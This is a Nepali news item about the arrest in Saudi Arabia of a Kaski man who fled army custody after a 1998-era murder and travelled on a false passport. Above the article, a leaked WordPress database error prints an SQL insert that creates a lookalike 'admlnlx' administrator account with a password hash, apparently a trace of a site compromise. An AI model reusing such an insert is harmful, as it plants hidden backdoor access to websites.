WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXH8KsiYSODUmhzLpWW/EuK4zUBmVk/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:11:31', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागनु १ –
अठार वर्षअघि हत्या गरी फरार कास्कीका नारायण अधिकारीलाई प्रहरीले साउदी अरबबाट पक्राउ गरी नेपाल ल्याएको छ । नेपाली सेनामा कार्यरत उनले २०५५ सालमा कास्कीको विर्दीखोलामा आपसी विवादमा शिवराज थापा सुयलको हत्या गरेका थिए ।
सेनाको हिरासतमा रहेका बेला उनी २०५६ सालमा भागेका थिए । उनले जिल्ला प्रशासन कार्यालयबाट जीवनबहादुर अधिकारीको नाममा नागरिकता र राहदानी लिएर साउदी अरब गएका थिए ।
अरब प्रहरीको सहयोगमा उनलाई पक्राउ गरिएको प्रहरीले जनाएको छ । हत्या गरेको पुष्टि गर्दै अधिकारीलाई जिल्ला अदालत कास्कीले सर्वस्वसहित जन्मकैदको फैसला सुनाएको थियो ।